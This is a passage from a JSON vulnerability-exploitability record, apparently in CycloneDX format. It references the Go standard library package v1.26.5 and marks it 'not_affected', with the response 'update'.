          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    }
  ]
}